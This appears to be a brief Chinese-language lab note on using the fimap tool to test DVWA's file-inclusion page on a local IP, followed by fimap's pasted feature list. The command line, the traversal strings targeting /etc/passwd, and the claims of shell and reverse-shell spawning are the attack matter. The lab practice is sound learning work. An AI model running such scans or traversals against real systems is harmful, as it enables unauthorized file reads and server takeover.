fimap
测试LFI和RFI的工具,
用它来测试dvwa的漏洞,
fimap -u 'http://192.168.234.132:8888/dvwa/vulnerabilities/fi/?page=include.php' --cookie="security=low; PHPSESSID=h70e76i4754ni0hm4m7gvjbm60" --verbose=3
没有测出漏洞,未知待解。
加上参数 --enable-blind 就能发现/etc/passwd
原理:
- Check a Single URL, List of URLs, or Google results fully automaticly.
- Can identify and exploit file inclusion bugs.
- Relative\Absolute Path Handling.
- Tries automaticly to eleminate suffixes with Nullbyte and other methods like Dot-Truncation.
- Remotefile Injection.
- Logfile Injection. (FimapLogInjection)
- Test and exploit multiple bugs:
- include()
- include_once()
- require()
- require_once()
- You always define absolute pathnames in the configs. No monkey like redundant pathes like:
- ../etc/passwd
- ../../etc/passwd
- ../../../etc/passwd
- Has a Blind Mode (--enable-blind) for cases when the server has disabled error messages. BlindMode
- Has an interactive exploit mode which...
- ...can spawn a shell on vulnerable systems.
- ...can spawn a reverse shell on vulnerable systems.
- ...can do everything you have added in your payload-dict inside the config.py
- Add your own payloads and pathes to the config.py file.
- Has a Harvest mode which can collect URLs from a given domain for later pentesting.
- Goto FimapHelpPage for all features.
- Works also on windows.
- Can handle directories in RFI mode like:
- <? include ($_GET["inc"] . "/content/index.html"); ?>
- <? include ($_GET["inc"] . "_lang/index.html"); ?>
- where Null-Byte is not possible.
- Can use proxys.
- Scans and exploits GET, POST and Cookies.
- Has a very small footprint. (No senseless bruteforcing of pathes - unless you need it.)
- Can attack also windows servers! (WindowsAttack)
- Has a tiny plugin interface for writing exploitmode plugins (PluginDevelopment)
- Check out the PHPInfo() Exploit plugin: FimapPhpInfoExploit
- Non Interactive Exploiting (FimapNonInteractiveExec)